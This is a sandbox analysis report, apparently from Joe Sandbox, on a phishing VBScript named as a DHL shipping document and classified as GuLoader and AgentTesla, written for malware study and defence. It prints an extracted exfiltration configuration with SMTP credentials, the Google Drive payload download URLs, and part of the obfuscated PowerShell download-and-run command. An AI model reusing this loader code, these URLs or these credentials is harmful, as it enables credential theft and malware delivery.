Windows Analysis Report
DHL Shipping doc.vbs

Overview

General Information

Sample name:	DHL Shipping doc.vbs
Analysis ID:	1430756
MD5:	e483b9251c12c243495cc209ff1fa8e1
SHA1:	3b1d7bdc1563c60ea44c9dd410018879fa1e392e
SHA256:	ab7caea9be94fcd8bf2b3bb9a1da2fbc4af30134a190718ffd81cdb4cc9a3641
Tags:	DHLvbs
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected AgentTesla

Yara detected GuLoader

Found suspicious powershell code related to unpacking or dynamic code loading

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware

Found malware configuration

Source: conhost.exe.6720.2.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}

Multi AV Scanner detection for submitted file

Source: DHL Shipping doc.vbs

Virustotal: Detection: 14%

Perma Link

Source: unknown	HTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2122178024.0000000008500000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2116646966.0000000007667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2116646966.00000000076E2000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49741 -> 114.142.162.17:26

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 114.142.162.17 114.142.162.17
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SERVERMULE-AS-APNimbus2PtyLtdAU SERVERMULE-AS-APNimbus2PtyLtdAU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: powershell.exe, 00000001.00000002.2329475776.000001D971C7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mUy
Source: powershell.exe, 00000004.00000002.2122178024.0000000008510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000001.00000002.2198052956.000001D959B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.cash4cars.nz
Source: powershell.exe, 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0R
Source: wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000001.00000002.2198052956.000001D959601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2108163000.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: powershell.exe, 00000001.00000002.2198052956.000001D959601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2108163000.0000000004C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBkq
Source: wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B800000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: wab.exe, 00000009.00000002.2928711448.0000000006AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: wab.exe, 00000009.00000002.2928711448.0000000006B01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928670685.0000000006A30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g
Source: powershell.exe, 00000001.00000002.2198052956.000001D959829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9P
Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9XR
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 00000009.00000003.2105897287.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2089818579.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928711448.0000000006B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: wab.exe, 00000009.00000003.2105897287.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2089818579.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2106027892.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download
Source: wab.exe, 00000009.00000002.2928711448.0000000006B01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=downloadQ
Source: wab.exe, 00000009.00000002.2928711448.0000000006B01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=downloadU
Source: wab.exe, 00000009.00000003.2105897287.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2089818579.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=downloade1
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download
Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2198052956.000001D95A17A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_6692.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_5932.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6692, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5932, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7520
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7520
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7520	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7520	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt 